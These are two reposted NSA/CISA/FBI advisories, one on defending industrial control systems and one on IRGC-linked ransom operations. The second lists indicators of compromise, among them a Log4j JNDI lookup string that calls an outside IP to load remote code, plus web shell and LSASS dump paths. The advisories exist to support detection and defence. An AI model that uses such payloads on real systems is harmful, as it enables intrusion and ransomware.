AA22-265A: Control System Defense: Know the Opponent

This post was originally published on this site

Original release date: September 22, 2022

Summary

Traditional approaches to securing OT/ICS do not adequately address current threats.

Operational technology/industrial control system (OT/ICS) assets that operate, control, and monitor day-to-day critical infrastructure and industrial processes continue to be an attractive target for malicious cyber actors. These cyber actors, including advanced persistent threat (APT) groups, target OT/ICS assets to achieve political gains, economic advantages, or destructive effects. Because OT/ICS systems manage physical operational processes, cyber actors’ operations could result in physical consequences, including loss of life, property damage, and disruption of National Critical Functions.

OT/ICS devices and designs are publicly available, often incorporate vulnerable information technology (IT) components, and include external connections and remote access that increase their attack surfaces. In addition, a multitude of tools are readily available to exploit IT and OT systems. As a result of these factors, malicious cyber actors present an increasing risk to ICS networks.

Traditional approaches to securing OT/ICS do not adequately address current threats to those systems. However, owners and operators who understand cyber actors’ tactics, techniques, and procedures (TTPs) can use that knowledge when prioritizing hardening actions for OT/ICS.

This joint Cybersecurity Advisory, which builds on previous NSA and CISA guidance to stop malicious ICS activity and reduce OT exposure [1] [2], describes TTPs that malicious actors use to compromise OT/ICS assets. It also recommends mitigations that owners and operators can use to defend their systems. NSA and CISA encourage OT/ICS owners and operators to apply the recommendations in this CSA.

Download the PDF version of this report: pdf, 538.12 kb

Technical Details

OT/ICS assets operate, control, and monitor industrial processes throughout U.S. critical infrastructure. Traditional ICS assets are difficult to secure due to their design for maximum availability and safety, coupled with their use of decades-old systems that often lack any recent security updates. Newer ICS assets may be able to be configured more securely, but often have an increased attack surface due to incorporating Internet or IT network connectivity to facilitate remote control and operations. The net effect of the convergence of IT and OT platforms has increased the risk of cyber exploitation of control systems. [3]

Today’s cyber realm is filled with well-funded malicious cyber actors financed by nation-states, as well as less sophisticated groups, independent hackers, and insider threats. Control systems have been targeted by a variety of these malicious cyber actors in recent years to achieve political gains, economic advantages, and possibly destructive effects. [4] [5] [6] [7] [8] More recently, APT actors have also developed tools for scanning, compromising, and controlling targeted OT devices. [9] 

Malicious actors’ game plan for control system intrusions

Cyber actors typically follow these steps to plan and execute compromises against critical infrastructure control systems:

  1. Establish intended effect and select a target.
  2. Collect intelligence about the target system.
  3. Develop techniques and tools to navigate and manipulate the system.
  4. Gain initial access to the system.
  5. Execute techniques and tools to create the intended effect.

Leveraging specific expertise and network knowledge, malicious actors such as nation-state actors can conduct these steps in a coordinated manner, sometimes concurrently and repeatedly, as illustrated by real world cyber activity. [5] [10]

Establish intended effect and select a target

Cyber actors, from cyber criminals to state-sponsored APT actors, target critical infrastructure to achieve a variety of objectives. Cyber criminals are financially motivated and target OT/ICS assets for financial gain (e.g., data extortion or ransomware operations). State-sponsored APT actors target critical infrastructure for political and/or military objectives, such as destabilizing political or economic landscapes or causing psychological or social impacts on a population. The cyber actor selects the target and the intended effect—to disrupt, disable, deny, deceive, and/or destroy—based on these objectives. For example, disabling power grids in strategic locations could destabilize economic landscapes or support broader military campaigns. Disrupting water treatment facilities or threatening to destroy a dam could have psychological or social impacts on a population. [11] [12]

Collect intelligence about the target system

Once the intent and target are established, the actor collects intelligence on the targeted control system. The actor may collect data from multiple sources, including:

  • Open-source research: A great deal of information about control systems and their designs is publicly available. For example, solicitation information and employment advertisements may indicate components and—list specific model numbers.
  • Insider threats: The actor may also leverage trusted insiders, even unwitting ones, for collecting information. Social engineering often elicits a wealth of information from people looking for a new job or even just trying to help.
  • Enterprise networks: The actor may compromise enterprise IT networks and collect and exfiltrate ICS-related information. Procurement documents, engineering specifications, and even configurations may be stored on corporate IT networks.

In addition to OT-specific intelligence, information about IT technologies used in control systems is widely available. Knowledge that was once limited to control system engineers and OT operators has become easily available as IT technologies move into more of the control system environment. Control system vendors, in conjunction with the owner/operator community, have continually optimized and reduced the cost of engineering, operating, and maintaining control systems by incorporating more commodity IT components and technologies in some parts of OT environments. These advancements sometimes can make information about some systems easily available, thereby increasing the risk of cyber exploitation. 

Develop techniques and tools

Using the intelligence collected about the control system’s design, a cyber actor may procure systems that are similar to the target and configure them as mock-up versions for practice purposes. Nation-state actors can easily obtain most control system equipment. Groups with limited means can still often acquire control systems through willing vendors and secondhand resellers.

Access to a mock-up of the target system enables an actor to determine the most effective tools and techniques. A cyber actor can leverage resident system utilities, available exploitation tools; or, if necessary, develop or purchase custom tools to affect the control system. Utilities that are already on the system can be used to reconfigure settings and may have powerful troubleshooting capabilities. 

As the control system community has incorporated commodity IT and modernized OT, the community has simplified the tools, techniques, scripts, and software packages used in control systems. As a result, a multitude of convenient tools are readily available to exploit IT and OT systems.

Actors may also develop custom ICS-focused malware based on their knowledge of the control systems. For example, TRITON malware was designed to target certain versions of Triconex Tricon programmable logic controllers (PLCs) by modifying in-memory firmware to add additional programming. The extra functionality allows an actor to read/modify memory contents and execute custom code, disabling the safety system. [13] APT actors have also developed tools to scan for, compromise, and control certain Schneider Electric PLCs, OMRON Sysmac NEX PLCs, and Open Platform Communications Unified Architecture (OPC UA) servers. [9] 

With TTPs in place, a cyber actor is prepared to do virtually anything that a normal system operator can, and potentially much more.

Gain initial access to the system

To leverage the techniques and tools that they developed and practiced, cyber actors must first gain access to the targeted system. 

Most modern control systems maintain remote access capabilities allowing vendors, integrators, service providers, owners, and operators access to the system. Remote access enables these parties to perform remote monitoring services, diagnose problems remotely, and verify warranty agreements. 

However, these access points often have poor security practices, such as using default and maintenance passwords. Malicious cyber actors can leverage these access points as vectors to covertly gain access to the system, exfiltrate data, and launch other cyber activities before an operator realizes there is a problem. Malicious actors can use web-based search platforms, such as Shodan, to identify these exposed access points. 

Vendor access to control systems typically use connections that create a bridge between control system networks and external environments. Often unknown to the owner/operator, this bridge provides yet another path for cyber exploitation and allows cyber actors to take advantage of vulnerabilities in other infrastructure to gain access to the control system. 

Remote access points and methodologies use a variety of access and communication protocols. Many are nothing more than vendor-provided dial-up modems and network switches protected only by obscurity and passwords. Some are dedicated devices and services that communicate via more secure virtual private networks (VPNs) and encryption. Few, if any, offer robust cybersecurity capabilities to protect the control system access points or prevent the transmission of acquired data outside the relatively secure environment of the isolated control system. This access to an ostensibly closed control system can be used to exploit the network and components.

Execute techniques and tools to create the intended effects

Once an actor gains initial access to targeted OT/ICS system, the actor will execute techniques, tools, and malware to achieve the intended effects on the target system. To disrupt, disable, deny, deceive, and/or destroy the system, the malicious actor often performs, in any order or in combination, the following activities:

  1. Degrade the operator’s ability to monitor the targeted system or degrade the operator’s confidence in the control system’s ability to operate, control, and monitor the targeted system. Functionally, an actor could prevent the operator’s display (human machine interface, or HMI) from being updated and selectively update or change visualizations on the HMI, as witnessed during the attack on the Ukraine power grid. [5] (Manipulation of View [T0832] )
  2. Operate the targeted control system. Functionally, this includes the ability to modify analog and digital values internal to the system (changing alarms and adding or modifying user accounts), or to change output control points — this includes abilities such as altering tap changer output signals, turbine speed demand, and opening and closing breakers. (Manipulation of Control [T0831])
  3. Impair the system’s ability to report data. Functionally, this is accomplished by degrading or disrupting communications with external communications circuits (e.g., ICCP , HDLC , PLC , VSAT, SCADA radio, other radio frequency mediums), remote terminal units (RTUs) or programmable logic controllers (PLCs), connected business or corporate networks, HMI subnetworks, other remote I/O, and any connected Historian/bulk data storage. (Block Reporting Message [T0804], Denial of View [T0815])
  4. Deny the operator’s ability to control the targeted system. Functionally, this includes the ability to stop, abort, or corrupt the system’s operating system (OS) or the supervisory control and data acquisition (SCADA) system’s software functionality. (Denial of Control [T0813])
  5. Enable remote or local reconnaissance on the control system. Functionally, an actor could obtain system configuration information to enable development of a modified system configuration or a custom tool. (Collection [TA0100], Theft of Operational Information [T0882])

Using these techniques, cyber actors could cause various physical consequences. They could open or close breakers, throttle valves, overfill tanks, set turbines to over-speed, or place plants in unsafe operating conditions. Additionally, cyber actors could manipulate the control environment, obscuring operator awareness and obstructing recovery, by locking interfaces and setting monitors to show normal conditions. Actors can even suspend alarm functionality, allowing the system to operate under unsafe conditions without alerting the operator. Even when physical safety systems should prevent catastrophic physical consequences, more limited effects are possible and could be sufficient to meet the actor’s intent. In some scenarios though, if an actor simultaneously manipulates multiple parts of the system, the physical safety systems may not be enough. Impacts to the system could be temporary or permanent, potentially even including physical destruction of equipment. 

Mitigations

The complexity of balancing network security with performance, features, ease-of-use, and availability can be overwhelming for owner/operators. This is especially true where system tools and scripts enable ease-of-use and increase availability or functionality of the control network; and when equipment vendors require remote access for warranty     compliance, service obligations, and financial/billing functionality. However, with the increase in targeting of OT/ICS by malicious actors, owner/operators should be more cognizant of the risks when making these balancing decisions. Owner/operators should also carefully consider what information about their systems needs to be publicly available and determine if each external connection is truly needed. [1] 

System owners and operators cannot prevent a malicious actor from targeting their systems. Understanding that being targeted is not an “if” but a “when” is essential context for making ICS security decisions. By assuming that the system is being targeted and predicting the effects that a malicious actor would intend to cause, owner/operators can employ and prioritize mitigation actions.

However, the variety of available security solutions can also be intimidating, resulting in choice paralysis. In the midst of so many options, owner/operators may be unable to incorporate simple security and administrative strategies that could mitigate many of the common and realistic threats. Fortunately, owner/operators can apply a few straightforward ICS security best practices to counter adversary TTPs. 

Limit exposure of system information

Operational and system information and configuration data is a key element of critical infrastructure operations. The importance of keeping such data confidential cannot be overstated. To the extent possible, avoid disclosing information about system hardware, firmware, and software in any public forum. Incorporate information protection education into training for personnel. Limit information that is sent out from the system.

Document the answers to the following questions:

  1. From where and to where is data flowing?
  2. How are the communication pathways documented and how is the data secured/encrypted?
  3. How is the data used and secured when it arrives at its destination?
  4. What are the network security standards at the data destination, whether a vendor/regulator or administrator/financial institution? 
  5. Can the data be shared further once at its destination? Who has the authority to share this data?

Eliminate all other data destinations. Share only the data necessary to comply with applicable legal requirements, such as those contractually required by vendors—nothing more. Do not allow other uses of the data and other accesses to the system without strict administrative policies designed specifically to protect the data. Prevent new connections to the control system using strict administrative accountability. Ensure strict agreements are in place with outside systems/vendors when it comes to sharing, access, and use. Have strong policies for the destruction of such data. Audit policies and procedures to verify compliance and secure data once it gets to its destination, and determine who actually has access to it. 

Identify and secure remote access points

Owner/operators must maintain detailed knowledge of all installed systems, including which remote access points are—or could be—operating in the control system network. Creating a full “connectivity inventory” is a critical step in securing access to the system.

Many vendor-provided devices maintain these access capabilities as an auxiliary function and may have services that will automatically ‘phone home’ in an attempt to register and update software or firmware. A vendor may also have multiple access points to cover different tasks. 

Once owner/operators have identified all remote access points on their systems, they can implement the following recommendations to improve their security posture:

  • Reduce the attack surface by proactively limiting and hardening Internet-exposed assets. See CISA’s Get Your Stuff Off Search page for more information.
  • Establish a firewall and a demilitarized zone (DMZ) between the control system and the vendor’s access points and devices. Do not allow direct access into the system; use an intermediary service to share only necessary data and only when required. For more information see CISA’s infographic Layering Network Security Through Segmentation. [14]
  • Consider using virtual private networks (VPNs) at specific points to and from the system rather than allowing separate access points for individual devices or vendors.
  • Utilize jump boxes to isolate and monitor access to the system.
  • Ensure that data can only flow outward from the system – administratively and physically. Use encrypted links to exchange data outside of the system.
  • Enforce strict compliance with policies and procedures for remote access, even if personnel complain that it is too difficult.
  • If the system does not use vendor access points and devices, ensure that none are active. Use strict hardware, software, and administrative techniques to prevent them from becoming covertly active.
  • Do not allow vendor-provided system access devices and software to operate continuously in the system without full awareness of their security posture and access logs.
  • Install and keep current all vendor-provided security systems associated with the installed vendor access points.
  • Review configurations to ensure they are configured securely. Operators typically focus on necessary functionality, so properly securing the configurations and remote access may be overlooked. 
  • Consider penetration testing to validate the system’s security posture and any unknown accesses or access vulnerabilities. 
  • Add additional security features to the system as needed. Do not assume that one vendor has a monopoly on the security of their equipment; other vendors may produce security features to fill gaps. 
  • Change all default passwords throughout the system and update any products with hard-coded passwords, especially in all remote access and security components.
  • Patch known exploited vulnerabilities whenever possible. Prioritize timely patching of all remote access points. Keep operating systems, firewalls, and all security features up-to-date.
  • Continually monitor remote access logs for suspicious accesses. Securely aggregate logs for easier monitoring.

Restrict tools and scripts 

Limit access to network and control system application tools and scripts to legitimate users performing legitimate tasks on the control system. Removing the tools and scripts entirely and patching embedded control system components for exploitable vulnerabilities is often not feasible. Thus, carefully apply access and use limitations to particularly vulnerable processes and components to limit the threat.

The control system and any accompanying vendor access points may have been delivered with engineering, configuration, and diagnostic tools pre-installed. Engineers use these tools to configure and modify the system and its processes as needed. However, such tools can also be used by a malicious actor to manipulate the system, without needing any special additional tools. Using the system against itself is a powerful cyber exploitation technique. Mitigations strategies include:

  1. Identify any engineering, configuration, or diagnostic tools.
  2. Securely store gold copies of these tools external to the system if possible.
  3. Remove all non-critical tools.
  4. Prevent these tools from being reinstalled.
  5. Perform routine audits to check that these tools have not been reinstalled.

Conduct regular security audits

The owner/operator of the control system should consider performing an independent security audit of the system, especially of third-party vendor access points and systems. The owner/operator cannot solely depend on the views, options, and guidance of the vendor/integrator that designed, developed, or sold the system. The goal of such an audit is to identify and document system vulnerabilities, practices, and procedures that should be eliminated to improve the cyber defensive posture, and ultimately prevent malicious cyber actors from being able to cause their intended effects. Steps to consider during an audit include the following:

  1. Validate all connections (e.g., network, serial, modem, wireless, etc.).
  2. Review system software patching procedures.
  3. Confirm secure storage of gold copies (e.g., OS, firmware, patches, configurations, etc.).
  4. Verify removal from the system of all non-critical software, services, and tools.
  5. Audit the full asset inventory. 
  6. Implement CISA ICS mitigations and best practices. [15] [16]
  7. Monitor system logs and intrusion detection system (IDS) logs.

Implement a dynamic network environment

Static network environments provide malicious actors with persistent knowledge of the system. A static network can provide cyber actors the opportunity to collect bits of intelligence about the system over time, establish long-term accesses into the system, and develop the tools and TTPs to affect the control system as intended. 

While it may be unrealistic for the administrators of many OT/ICS environments to make regular non-critical changes, owner/operators should consider periodically making manageable network changes. A little change can go a long way to disrupt previously obtained access by a malicious actor. Consider the following:

  1. Deploy additional firewalls and routers from different vendors.
  2. Modify IP address pools.
  3. Replace outdated hardware (e.g., workstations, servers, printers, etc.).
  4. Upgrade operating systems.
  5. Install or upgrade commercially available security packages for vendor access points and methodologies.

Planning these changes with significant forethought can help minimize the impact on network operation.

Owner/operators should familiarize themselves with the risks to the system as outlined by the product vendor. These may be described in manuals as the system using insecure protocols for interoperability or certain configurations that may expose the system in additional ways. Changes to the system to reduce these risks should be considered and implemented when feasible.

Conclusion

The combination of integrated, simplified tools and remote accesses creates an environment ripe for malicious actors to target control systems networks. New IT-enabled accesses provide cyber actors with a larger attack surface into cyber-physical environments. It is vital for OT/ICS defenders to anticipate the TTPs of cyber actors combining IT expertise with engineering know-how. Defenders can employ the mitigations listed in this advisory to limit unauthorized access, lock down tools and data flows, and deny malicious actors from achieving their desired effects. 

Disclaimer of endorsement

The information and opinions contained in this document are provided “as is” and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.

Purpose

This advisory was developed by NSA and CISA in furtherance of their cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.
 

Contact Information

For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov. To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov

Media Inquiries / Press Desk: 

References

Revisions

  • Initial Release: September 22, 2022

This product is provided subject to this Notification and this Privacy & Use policy.

AA22-257A: Iranian Islamic Revolutionary Guard Corps-Affiliated Cyber Actors Exploiting Vulnerabilities for Data Extortion and Disk Encryption for Ransom Operations

This post was originally published on this site

Original release date: September 14, 2022

Summary

Actions to take today to protect against ransom operations:

• Keep systems and software updated and prioritize remediating known exploited vulnerabilities.
• Enforce MFA.
• Make offline backups of your data.

This joint Cybersecurity Advisory (CSA) is the result of an analytic effort among the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), U.S. Cyber Command (USCC) – Cyber National Mission Force (CNMF), the Department of the Treasury (Treasury), the Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), and the United Kingdom’s National Cyber Security Centre (NCSC) to highlight continued malicious cyber activity by advanced persistent threat (APT) actors that the authoring agencies assess are affiliated with the Iranian Government’s Islamic Revolutionary Guard Corps (IRGC). Note: The IRGC is an Iranian Government agency tasked with defending the Iranian Regime from perceived internal and external threats. Hereafter, this advisory refers to all the coauthors of this advisory as “the authoring agencies.”

This advisory updates joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities, which provides information on these Iranian government-sponsored APT actors exploiting known Fortinet and Microsoft Exchange vulnerabilities to gain initial access to a broad range of targeted entities in furtherance of malicious activities, including ransom operations. The authoring agencies now judge these actors are an APT group affiliated with the IRGC.

Since the initial reporting of this activity in the FBI Liaison Alert System (FLASH) report APT Actors Exploiting Fortinet Vulnerabilities to Gain Access for Malicious Activity from May 2021, the authoring agencies have continued to observe these IRGC-affiliated actors exploiting known vulnerabilities for initial access. In addition to exploiting Fortinet and Microsoft Exchange vulnerabilities, the authoring agencies have observed these APT actors exploiting VMware Horizon Log4j vulnerabilities for initial access. The IRGC-affiliated actors have used this access for follow-on activity, including disk encryption and data extortion, to support ransom operations.

The IRGC-affiliated actors are actively targeting a broad range of entities, including entities across multiple U.S. critical infrastructure sectors as well as Australian, Canadian, and United Kingdom organizations. These actors often operate under the auspices of Najee Technology Hooshmand Fater LLC, based in Karaj, Iran, and Afkar System Yazd Company, based in Yazd, Iran. The authoring agencies assess the actors are exploiting known vulnerabilities on unprotected networks rather than targeting specific targeted entities or sectors.

This advisory provides observed tactics, techniques, and indicators of compromise (IOCs) that the authoring agencies assess are likely associated with this IRGC-affiliated APT. The authoring agencies urge organizations, especially critical infrastructure organizations, to apply the recommendations listed in the Mitigations section of this advisory to mitigate risk of compromise from these IRGC-affiliated cyber actors.

For a downloadable copy of IOCs, see AA22-257A.stix.

For more information on Iranian state-sponsored malicious cyber activity, see CISA’s Iran Cyber Threat Overview and Advisories webpage and FBI’s Iran Threat webpage.

Download the PDF version of this report: pdf, 801 kb

Technical Details

Threat Actor Activity

As reported in joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities, the authoring agencies have observed Iranian government-sponsored APT actors scanning for and/or exploiting the following known Fortinet FortiOS and Microsoft Exchange server vulnerabilities since early 2021 to gain initial access to a broad range of targeted entities: CVE-2018-13379, CVE-2020-12812, CVE-2019-5591, and CVE-2021-34473 (a ProxyShell vulnerability). The authoring agencies have also observed these APT actors leveraging CVE-2021-34473 against U.S. networks in combination with ProxyShell vulnerabilities CVE-2021-34523 and CVE-2021-31207. The NCSC judges that Yazd, Iran-based company Afkar System Yazd Company is actively targeting UK organizations. Additionally, ACSC judges that these APT actors have used CVE-2021-34473 in Australia to gain access to systems. The APT actors can leverage this access for further malicious activities, including deployment of tools to support ransom and extortion operations, and data exfiltration.

Since the activity was reported in 2021, these IRGC-affiliated actors have continued to exploit known vulnerabilities for initial access. In addition to exploiting Fortinet and Microsoft Exchange vulnerabilities, the authoring agencies have observed these APT actors exploiting VMware Horizon Log4j vulnerabilities CVE-2021-44228 (“Log4Shell”), CVE-2021-45046, and CVE-2021-45105 for initial access.

The IRGC-affiliated actors have used their access for ransom operations, including disk encryption and extortion efforts. After gaining access to a network, the IRGC-affiliated actors likely determine a course of action based on their perceived value of the data. Depending on the perceived value, the actors may encrypt data for ransom and/or exfiltrate data. The actors may sell the data or use the exfiltrated data in extortion operations or “double extortion” ransom operations where a threat actor uses a combination of encryption and data theft to pressure targeted entities to pay ransom demands.

IRGC-affiliated actor activity observed by the authoring agencies includes:

  • In December 2021, the actors exploited ProxyShell vulnerabilities (likely CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) on a Microsoft Exchange server to gain access to the network of a U.S. police department. The actors used their access to move laterally within the network, encrypt network devices with BitLocker, and hold the decryption keys for ransom.
  • In December 2021, the actors exploited ProxyShell vulnerabilities (likely CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207), on a Microsoft Exchange server to gain access to the network of a U.S. regional transportation company. The actors used their access to move laterally within the network, encrypt network devices with BitLocker, and hold the decryption keys for ransom. This activity disrupted the transportation company’s operations for an extended period.
  • In February 2022, the actors exploited a Log4j vulnerability (likely CVE-2021-44228, CVE-2021-45046, and/or CVE-2021-45105) in a VMware Horizon application to gain access to the network of a U.S. municipal government, move laterally within the network, establish persistent access, initiate crypto-mining operations, and conduct additional malicious activity.
  • In February 2022, the actors may have exploited a Log4j vulnerability (likely CVE-2021-44228, CVE-2021-45046, and/or CVE-2021) to gain access to the network of a U.S. aerospace company. The actors leveraged a server that the authoring agencies assess is associated with the IRGC-affiliated actors to exfiltrate data from the company’s network.

MITRE ATT&CK® Tactics and Techniques

Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 11. See Appendix B for a table of the MITRE ATT&CK tactics and techniques observed.

The authoring agencies assess the following tactics and techniques are associated with this activity.

Resource Development [TA0042]

The IRGC-affiliated actors have used the following malicious and legitimate tools [T1588.001, T1588.002] for a variety of tactics across the enterprise spectrum:

  • Fast Reverse Proxy (FRP) for command and control (C2)
  • Plink for C2
  • Remote Desktop Protocol (RDP) for lateral movement
  • BitLocker for data encryption
  • SoftPerfect Network Scanner for system network configuration discovery

Note: For additional tools used by these IRGC-affiliated cyber actors, see joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities.

Initial Access [TA0001]

As stated in the Technical Details section previously reported in joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities, the IRGC-affiliated actors gained initial access by exploiting known vulnerabilities [T1190].

The following IOCs, observed as of March 2022, are indicative of ProxyShell vulnerability exploitation on targeted entity networks:

  • Web shells with naming conventions aspx_[11 randomly generated alphabetic characters].aspx, login.aspx, or default.aspx in any of the following directories:
    • C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyecpauth
    • C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauth
    • C:inetpubwwwrootaspnet_client

The following IOCs, observed as of December 2021, are indicative of Log4j vulnerability exploitation on targeted entity networks:

  • ${jdni:ldap//148.251.71.182:1389/RCE} (user agent string)
  • RCE.class

Execution [TA0002]

The IRGC-affiliated actors may have made modifications to the Task Scheduler [T1053.005]. These modifications may display as unrecognized scheduled tasks or actions. Specifically, the below established tasks may be associated with this activity:

  • Wininet
  • Wininet’
  • WinLogon
  • CacheTask

Note: The potential exists that tasks associated with CacheTask or Wininet may be legitimate. For additional tasks used by these IRGC-affiliated cyber actors, see joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities.

Persistence [TA0003]

The IRGC-affiliated actors established new user accounts on domain controllers, servers, workstations, and active directories [T1136.001, T1136.002]. The actors enabled a built-in Windows account (DefaultAccount) and escalated privileges to gain administrator-level access to a network. Some of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization. In addition to unrecognized user accounts or accounts established to masquerade as existing accounts, the following account usernames may be associated with this activity:

  • Domain Admin
  • it_admin
  • DefaultAccount
  • Default01

Note: For additional account usernames associated with this activity, see joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities.

Exfiltration [TA0010]

The authoring agencies have observed the IRGC-affiliated actors dumping and subsequently exfiltrating the Local Security Authority Subsystem Service (LSASS) process memory on targeted entity networks in furtherance of credential harvesting. The following IOCs are associated with data exfiltration from targeted entity networks:

  • C:WindowsTempsassl[.]pmd
  • C:WindowsTempssasl[.]zip
  • C:UsersDefaultAccountAppDataLocalTemplsass[.]dmp
  • C:UsersDefaultAccountAppDataLocalTemplsass[.]zip

Impact [TA0040]

The IRGC-affiliated actors forced BitLocker activation on host networks to encrypt data [T1486] and held the decryption keys for ransom. The corresponding ransom notes were sent to the targeted entity, left on the targeted entity network as a .txt file or printed on the targeted entity’s networked printer(s). The notes included the following contact information:

  • @BuySafety (Telegram)
  • @WeRBits (Telegram)
  • +93794415076 (WhatsApp)
  • werbits@onionmail[.]org
  • buysafety@onionmail[.]org
  • yacashcash@rambler[.]ru

Note: For additional contact information included in ransom notes, see joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities.

DETECTION

The authoring agencies recommend that organizations using Microsoft Exchange servers, Fortinet devices, and/or VMware Horizon applications investigate potential suspicious activity in their networks.

  • Search for IOCs. Collect known-bad IOCs and search for them in network and host artifacts.
    • Note: Refer to Appendix A for IOCs.
  • Review Log4j vulnerabilities, including CVE-2021-44228, CVE-2021-45046, and CVE-2021- 45105.
  • Review Microsoft Exchange ProxyShell vulnerabilities, including CVE-2021-34473, CVE-2021- 34523, and CVE-2021-31207.
  • As a precaution, review additional Microsoft Exchange vulnerabilities, including CVE-2021- 31196, CVE-2021-31206, CVE-2021-33768, CVE-2021-33766, and CVE-2021-34470 because the authoring agencies have seen the actors broadly target Microsoft Exchange servers.
  • Investigate exposed Microsoft Exchange servers, both patched and unpatched, for compromise.
  • Review Fortinet FortiOS vulnerabilities, including CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591.
  • Review VMware vulnerabilities, including any relevant vulnerabilities listed on the VMware security advisory page.
  • Investigate changes to RDP, firewall, and Windows Remote Management (WinRM) configurations that may allow malicious cyber actors to maintain persistent access.
  • Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.
  • Review Task Scheduler for unrecognized scheduled tasks. Additionally, manually review operating-system and scheduled tasks—including each step these tasks perform—for unrecognized “actions.”
  • Review antivirus logs for indications they were unexpectedly turned off.
  • Look for WinRAR and FileZilla in unexpected locations.
  • Review servers and workstations for malicious executable files masquerading as legitimate Windows processes. Malicious files may not be found in the expected directory and may have cmd.exe or powershell.exe as their parent process.

Note: For additional approaches on uncovering malicious cyber activity, see joint advisory Technical Approaches to Uncovering and Remediating Malicious Activity, authored by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom.

Mitigations

The authoring agencies urge network defenders to prepare for and mitigate potential cyber threats immediately by implementing the mitigations below.

Implement and Enforce Backup and Restoration Policies and Procedures

  • Maintain offline (i.e., physically disconnected) backups of data, and regularly test backup and restoration. These practices safeguard an organization’s continuity of operations or at least minimize potential downtime from a ransomware or other destructive data incident and protect against data losses.
    • Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure.
  • Activate BitLocker on all networks and securely back up BitLocker keys with Microsoft and with an independent offline backup.
  • Create, maintain, and exercise a basic cyber incident response plan that includes response procedures for a ransom incident.
  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, secure location (e.g., hard drive, storage device, the cloud).

Patch and Update Systems

  • U.S. federal, state, local, tribal, and territorial (SLTT) government and critical infrastructure organizations: Implement free CISA Cyber Hygiene Services Vulnerability Scanning to enable continuous scans of public, static IPs for accessible services and vulnerabilities.
  • Install updates/patch operating systems, software, and firmware as soon as updates/patches are released. Regularly check software updates and end-of-life notifications. Consider leveraging a centralized patch management system to automate and expedite the process.
  • Immediately patch software affected by vulnerabilities identified in this advisory: CVE-2021- 34473, CVE-2018-13379, CVE-2020-12812, CVE-2019-5591, CVE-2021-34523, CVE-2021- 31207, CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, CVE-2021-31196, CVE-2021- 31206, CVE-2021-33768, CVE-2021-33766, and CVE-2021-34470.

Evaluate and Update Blocklists and Allowlists

  • Regularly evaluate and update blocklists and allowlists.
  • If FortiOS is not used by your organization, add the key artifact files used by FortiOS to your organization’s execution blocklist. Prevent any attempts to install or run this program and its associated files.

Implement Network Segmentation

  • Implement network segmentation to restrict a malicious threat actor’s lateral movement.

Secure User Accounts

  • Audit user accounts with administrative privileges and configure access controls under the principles of least privilege and separation of duties.
  • Require administrator credentials to install software.

Implement Multifactor Authentication

  • Use multifactor authentication where possible, particularly for webmail, virtual private networks (VPNs), accounts that access critical systems, and privileged accounts that manage backups.

Use Strong Passwords

Secure and Monitor RDP and other Potentially Risky Services

  • If you use RDP, restrict it to limit access to resources over internal networks. After assessing risks, if your organization deems RDP operationally necessary, restrict the originating sources, and require MFA to mitigate credential theft and reuse. If RDP must be available externally, use a VPN, virtual desktop infrastructure, or other means to authenticate and secure the connection before allowing RDP to connect to internal devices.
  • Disable unused remote access/RDP ports.
  • Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts (to block brute force campaigns), and log RDP login attempts.

Use Antivirus Programs

  • Install and regularly update antivirus and anti-malware software on all hosts.

Secure Remote Access

  • Only use secure networks.
  • Consider installing and using a VPN for remote access.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Appendix B).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESPONDING TO RANSOMWARE OR EXTORTION INCIDENTS

If a ransomware or extortion incident occurs at your organization:

Note: The authoring agencies strongly discourage paying ransoms as doing so does not guarantee files and records will be recovered and may pose sanctions risks.

RESOURCES

